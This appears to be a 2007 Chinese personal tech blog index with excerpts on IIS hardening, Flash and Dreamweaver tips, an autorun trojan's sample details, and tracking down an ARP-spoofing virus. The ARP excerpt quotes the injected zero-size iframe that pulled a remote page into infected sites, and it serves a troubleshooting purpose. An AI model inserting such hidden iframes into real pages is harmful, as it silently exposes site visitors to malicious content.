Google [站内搜索]
预览模式: 普通 | 列表

[私密日志] 私密日志

编辑:dnawo  日期:2007-06-27

该日志是私密日志,只有博主或发布者可以查看!
分类:其他 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1939

网站安全从结构做起

编辑:dnawo  日期:2007-06-26


图1

上图为IIS中一网站目录结构,其中data目录存放网站数据库、images存放网站图片、upload用于存放上传文件、其他目录则存放的都是ASP文件,那么IIS中可设置如下:网站总属性将"执行权限"设置成"纯脚本"(图2),data、images和upload再单独将"执行权限"设置成"无"(图3)。很多入侵者都是通过各种手段(sql注入、暴库)获取管理员帐号,然后登录后台上传ASP木马而实现入侵,经上边设置后上传至data、images和upload的ASP木马将不能运行,这样就降低了网站被黑的风险。

查看更多...

分类:服务器 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 4369

比较Dreamweaver和Word表格插入行操作

编辑:dnawo  日期:2007-06-25

一、只能将新行插在上方的Dreamweaver

Dreamweaver中将光标放置于任一行上,按Ctrl+M,将在当前行上方插入一新行,而大部分情况我是想将新行添加到当前行下方,查找了所有的菜单发觉Dreamweaver不能像Word那样可以直接选择将新行插在当前行的上方或是下方:

查看更多...

分类:网页设计 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 6140

表单验证中的一些简写方法

编辑:dnawo  日期:2007-06-22

最啰嗦的写法:
HTML代码


[Ctrl+A 全部选择 提示:你可先修改部分代码,再按运行]

查看更多...

分类:脚本语言 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5155

远程分析IIS设置

编辑:dnawo  日期:2007-06-22

提起微软公司IIS web服务器的安全问题,很多人立刻就会联想到那些为人们所称颂的致命漏洞: UNICODE , CGI 解析, .ida,idq, .Printer远程溢出等. 这些伟大的漏洞恐怕是我等scriptskidding的最爱了,利用他们可以很轻松的拿到较高的系统权限。但是这篇文章并非是讨论这些致命的漏洞的,只是比较详细的介绍了如何远程判断IIS 服务器的各种设置,如目录权限,认证方法等等,文中有些东西已经很老了,但是新的东西还是值得一看的。 希望本文能够起到一个抛砖引玉的作用。好了,废话少说,Go~!


远程确定目录权限

查看更多...

分类:网络技术 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 4369

autorun病毒(PegeFile.pif/Trojan.PSW.Win32.Agent.mk)

编辑:dnawo  日期:2007-06-21

病毒名字:Trojan.PSW.Win32.Agent.mk(Rising)
样本名:PegeFile.pif
加壳:UPX
文件大小:16,945 字节
MD5:A3AEB72FCDEEB46C04936564419C7275

查看更多...

分类:操作系统 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 9092

让人称绝的404错误页面

编辑:dnawo  日期:2007-06-20

在http规则中用404来表示某个页面不能访问,一般来说,网站的404错误页面都是IIS或APACHE默认的页面,千篇一律,非常单调。由于可以自己订制,于是后来就衍生出了许多个性化的奇趣版的404错误页面。笔者在此就拿一些国内外的比较好的创意来为大家介绍一下。 

一、404页面上的Flash创意 

1.Flash游戏的选材上堪称绝! 

查看更多...

分类:网页设计 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5380

找出局域网ARP欺骗的病毒源

编辑:dnawo  日期:2007-06-19

一、症状

先是不断弹出IP冲突信息,之后访问所有站点发现在代码的第一行都被加了"<iframe src=http://6688.89111.cn/123.htm width=0 height=0></iframe>"。

二、查找病毒源

查看更多...

分类:网络技术 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 6200

去除Flash文本框的文本格式

编辑:dnawo  日期:2007-06-19

不知怎么回事,从Flash中输入信息发给ASP保存到数据库时老是会多出HTML代码,查找了一番最终在其帮助文件中看到:

引用内容 引用内容
Flash 使您可以在输入文本字段和动态文本字段中保留丰富文本格式。如果您在"属性"检查器中选择"将文本呈现为 HTML"格式选项,或者将 TextField 对象的 html 属性设置为 true,则在您导出 SWF 文件时,Flash 会通过自动应用相应的 HTML 标记在文本字段中保留基本文本格式(如字体、样式、颜色和大小)和超级链接。

可是我并未钩选"将文本呈现为 HTML",也未"将 TextField 对象的 html 属性设置为 true",为什么呢?

查看更多...

分类:网页设计 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5802

两个Flash画圆函数

编辑:dnawo  日期:2007-06-19

复制内容到剪贴板程序代码 程序代码
this.createEmptyMovieClip("circle2_mc", 2);
circle2_mc.lineStyle(0, 0x000000);
drawCircle(circle2_mc, 100, 100, 100);
function drawCircle(mc:MovieClip, x:Number, y:Number, r:Number):Void {
    mc.moveTo(x+r, y);

查看更多...

分类:网页设计 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 7841